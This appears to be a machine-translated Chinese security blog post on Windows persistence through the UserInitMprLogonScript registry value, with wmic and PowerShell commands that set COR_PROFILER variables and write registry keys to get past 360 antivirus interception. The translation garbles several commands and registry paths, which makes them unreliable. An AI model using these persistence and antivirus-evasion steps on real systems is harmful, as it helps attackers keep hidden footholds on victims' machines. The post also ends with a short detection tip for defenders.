使用登录脚本维护持久性

0x00 前言

还是后门利用方式的介绍，这次是使用登录脚本的方式。但是，我在研究的过程中发现了一个特殊的用法。脚本在杀毒软件之前执行，可以绕过杀毒软件对敏感操作的拦截。本文将详细介绍这一技巧。

注：

一些防病毒软件可以在登录脚本之前启动。

0x01 简介

登录脚本用法

绕过360拦截wmi调用

特殊用法

0x02 Logon Scripts用法

这个想法来自Adam@Hexacorn，地址如下：

http://www . hexa corn . com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

简要介绍Logon Scripts的用法

注册表路径：HKCU \环境\

创建字符串键值：UserInitMprLogonScript

键值设置为bat的绝对路径：c:\test\11.bat

如下图

Bat内容如下：

开始calc.exe

注销，登录

执行脚本11.bat来弹出计算器。

0x03 绕过360对通过wmi修改环境变量的拦截

之前的文章《Use CLR to maintain persistence》提到了使用wmic修改环境变量的方法。

该命令如下所示：

wmic环境创建名称='COR_ENABLE_PROFILING '，用户名='%username% '，变量值='1 '

wmic环境创建名称='COR_PROFILER '，用户名='%username% '，变量值=' { 111111111-1111-1111-1111-1111111111 } '

但是，360会拦截WMI操作，如下图所示

事实上，通过WMI添加环境变量相当于在注册表HKCR \环境中创建新的键值。

因此，可以通过写入注册表来代替WMI操作。

以上WMI命令可以替换为以下powershell代码：

new-item property“HKCU:\环境”COR _ ENABLE _ PROFILING-value“1”-property type string | Out-Null

new-item property“HKCU:\环境”COR _ PROFILER-value“{ 1111111111-1111-1111-1111-111111111 }”-property type string | Out-Null

0x04 特别用法

源于我的一个特别的想法。

在我研究这项技能的过程中，我想到了一个有趣的想法。登录脚本的启动顺序是否在其他程序之前？

如果有，是否也优先于杀毒软件？

这是我的测试：

1、cmd输入如下代码

wmic环境创建名称='测试'，用户名=' %用户名% '，变量值='我跑得更快！'

不出意外，被拦截。

2、设置Logon Scripts

11.bat代码如下：

wmic环境创建名称='测试'，用户名=' %用户名% '，变量值='我跑得更快！'

注册查询HKEY当前用户环境/V测试

中止

3、启用Logon Scripts

注册表路径：HKCR \环境\

创建字符串键值：UserInitMprLogonScript

键值设置为bat的绝对路径：c:\test\11.bat

由于调用WMI会被拦截，可以通过powershell实现，代码如下：

new-item property ' HKCU:\环境' UserInitMprLogonScript-value ' c:\ test \ 11 . bat '-property type string | Out-Null

4、注销，重新登录，测试

如果注册表HKCR \环境\被成功写入键值测试REG_SZ我运行得更快！表示登录脚本优先于防病毒软件，绕过了防病毒软件的限制。

完整的操作如下

试验成功，验证了我们的结论。

0x05 防御

监控注册表项HKCR \环境\ userinitmprlogonscript

0x06 小结

本文测试了登录脚本的用法，并介绍了一种特殊用法。登录脚本可以在杀毒软件之前执行，绕过杀毒软件对敏感操作的拦截。

从防守的角度来说，对此要警惕。

留下回复